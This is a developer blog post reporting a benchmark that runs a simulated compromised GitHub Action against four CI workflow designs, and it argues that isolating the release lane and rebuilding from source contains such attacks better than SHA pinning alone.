Ahmed Yasser

Posted on Apr 3

Your AI Agent Will Make CI Supply-Chain Defense Either Too Weak or Too Expensive

#security #ai #webdev #programming

SHA pinning wasn't enough. Enterprise hardening was too much. So I built a benchmark.

When tj-actions/changed-files was compromised, the advice spread fast: pin your SHAs, reduce token permissions, review your workflows.

That advice was not wrong. It was just incomplete.

What kept bothering me was this: pinning only helps if the thing you pinned is not already malicious. If the pinned code is the attack, or the compromised version is exactly what your workflow is using, then SHA pinning gives you determinism, not safety.

That turned into a bigger frustration I kept seeing in practice, especially when AI coding agents started generating CI security fixes.

You build a normal project. You are not trying to become a deep CI security specialist. Then the model suddenly proposes an enterprise-grade answer: hardened runners, attestation, egress controls, multiple extra jobs, maybe cloud federation, maybe more. Some people accept it, but the overhead is high. Some reject it immediately because the performance hit and operational burden feel too big. Then the "smart compromise" is to tell the AI to make the minimal secure fix, and it usually lands on the same answer: SHA pinning plus basic permission scoping.

That is better than nothing. It is also not enough.

So I wanted to find the missing middle: a solution stronger than the typical AI-generated "just pin the SHA" workflow, but much lighter than a full enterprise security stack. I wanted something that meaningfully changed the blast radius without adding significant cost.

The Question

What CI architecture actually contains a compromised action?

I did not want an opinion post. I wanted an experiment.

I built a reproducible benchmark that keeps the repository, source file, malicious action, and GitHub Actions platform constant. The only changing variable is the workflow architecture.

If the same malicious action runs against four different CI designs, which design actually stops the bad outcomes?

The Setup

The repo contains:

a tiny deterministic app
a fake deploy script
a local composite action that simulates a compromised third-party action

The app is intentionally trivial because I wanted the benchmark to measure CI trust boundaries, not application complexity.

The malicious action performs six behaviors:

Environment variable dumping
GITHUB_TOKEN permission probing
Process memory access checks
Outbound exfiltration attempts
Artifact poisoning
Source enumeration

I ran that same action against four workflow tiers.

Tier 1: No Security

This is the insecure baseline.

third-party code runs in the same job as deployment secrets
release happens from the same compromised workspace
the artifact upload happens after the malicious action can already modify it

Tier 2: SHA-Pinned

This is the typical "minimal security fix" AI agents often suggest.

pin actions by SHA
reduce workflow permissions
keep the same workflow shape

This tier isolates what pinning and token scoping actually buy you when compromised code still executes in the trusted lane.

Tier 3: Trusted Release Boundary

This is the candidate solution.

the untrusted lane gets no deployment secrets
the trusted release lane is separate
outputs crossing the boundary are validated
the release lane runs on a fresh runner
the release lane rebuilds from source instead of consuming artifacts from the untrusted lane

This is the core idea I ended up calling the Trusted Release Boundary.

Tier 4: Enterprise

This keeps the Tier 3 boundary model and adds stronger controls:

hardened runner with egress blocking
artifact attestation
more operational complexity

This is the upper-bound comparison, not the target solution for most teams.

Full repo:

https://github.com/AlphaSudo/sbtr-benchmark

The Results

Here is the final score table:

Tier	Architecture	Score	Annual Cost
1	No security	10/100	$0
2	SHA-pinned	20/100	$0
3	Trusted Release Boundary	75/100	$0
4	Enterprise (egress + attestation)	83/100	enterprise-style overhead

The exact score matters less than the shape of the jump.

Tier 1

Tier 1 got owned exactly the way you would expect:

secrets were accessible in the same job
the token could create releases
outbound exfiltration worked
the artifact was poisoned and shipped

This is full CI trust collapse.

Tier 2

Tier 2 improved one thing: token abuse. The workflow token could no longer create releases.

But almost everything else stayed bad:

the malicious action still saw secrets
outbound exfiltration still worked
the artifact was still poisoned and shipped

This is the point of the benchmark. SHA pinning did not fail because pinning is useless. It failed because pinning is not a containment strategy. It protects against mutable references and update drift. It does not protect you when the pinned version is already compromised.

Tier 3

Tier 3 is where the architecture changes the outcome.

The malicious action still runs, but:

the untrusted lane has no deployment secrets
the token is not write-capable in any meaningful release sense
outputs cross a validation gate
the trusted lane rebuilds from source on a fresh runner
the shipped artifact is clean

This is the key result. The malicious action still executes, but it cannot meaningfully corrupt the release path because it never enters the trusted release domain.

Tier 4

Tier 4 was strongest overall:

no secrets in the untrusted lane
outbound exfiltration blocked
validation gate present
clean artifact rebuilt from source
successful provenance attestation

This tier also taught a useful lesson. The first attestation attempt failed because the hardened egress policy was too strict and blocked Sigstore endpoints. After allowing fulcio.sigstore.dev and rekor.sigstore.dev, the release succeeded.

That is the reality of enterprise controls: they can be very strong, but they also increase the operational tuning burden.

The Climax: Artifact Integrity

The most convincing proof in the benchmark was not the secret count. It was the artifact result.

Tier 1 shipped a poisoned artifact
Tier 2 shipped a poisoned artifact
Tier 3 shipped a clean artifact
Tier 4 shipped a clean artifact

Same repository. Same source file. Same malicious action. Same platform.

The variable was architecture.

That is the point where this stops being theoretical. If an attacker can modify the artifact you ship, then the debate about whether a workflow "looked secure" is over.

The Framework

The benchmark converged on a six-rule model:

Rule	Name	Purpose
0	PIN	Immutable SHA references for all external actions
1	QUARANTINE	Untrusted lane gets no secrets and no write authority
2	ISOLATE	Trusted lane is separate and first-party only
3	REBUILD	Trusted lane rebuilds from source on a fresh runner
4	ARTIFACT QUARANTINE	Only metadata crosses the boundary, never untrusted binaries
5	VALIDATE	Outputs crossing the boundary are explicitly sanitized

Why this matters:

PIN is still necessary, but it is not the whole answer
QUARANTINE and ISOLATE stop same-job trust collapse
REBUILD and ARTIFACT QUARANTINE stop poisoned binaries from riding the release path
VALIDATE closes the quieter gap where untrusted outputs become trusted control inputs

That combination is what makes Tier 3 work.

And that is why I think this is a useful practical framework: it gives teams a real middle path:

stronger than "just pin the SHA"
far lighter than "full enterprise security stack"

Honest Limitations

A few caveats matter.

First, this benchmark repo is public. That means source exposure is less severe than it would be in a private repository.

Second, the malicious action is simulated. It is designed to be reproducible, not stealthy. A real attacker would likely be quieter.

Third, there was a line-ending caveat. Local Windows hashing used CRLF, while GitHub-hosted Linux runners built artifacts from LF checkouts. So clean artifact comparisons had to be anchored to the normalized Linux source hash.

Fourth, Tier 3 still leaves outbound network access open. That is one reason Tier 4 scores higher. TRB is the biggest low-cost jump, not the final possible hardening state.

Why I Think This Matters

What I wanted out of this project was not a perfect security architecture for every team. I wanted a better answer to a very common failure mode:

someone wants more than SHA pinning, but does not want enterprise-grade overhead.

That is exactly where a lot of real teams live.

They are not ignoring security. They just cannot justify a dramatic performance hit, a large operations burden, or a full platform-engineering project because an AI assistant suggested the maximum possible hardening pattern.

The benchmark result suggests there is a much better default answer:

build a trusted release boundary.

That is the smallest change in this experiment that materially changed the attack outcome.

Try To Break It

If you want to reproduce the benchmark, the repository includes the workflows, malicious action, evidence, and reproduction guide.

Repo: https://github.com/AlphaSudo/sbtr-benchmark
Reproduction guide: REPRODUCE.md
Results: RESULTS.md

I genuinely want feedback on where this model breaks, where the validation boundary is too weak, or where the assumptions stop holding under more realistic CI environments.

Because the goal here is not to claim "problem solved."

The goal is to offer a better alternative than:

overkill enterprise security that many teams will reject
minimal SHA-only hardening that still leaves the release path too exposed

If that middle path is useful, then this benchmark did its job.

If you've seen CI patterns that break this model, leave them in the comments. I'm especially interested in where Tier 3 fails in real-world workflows.

DEV Community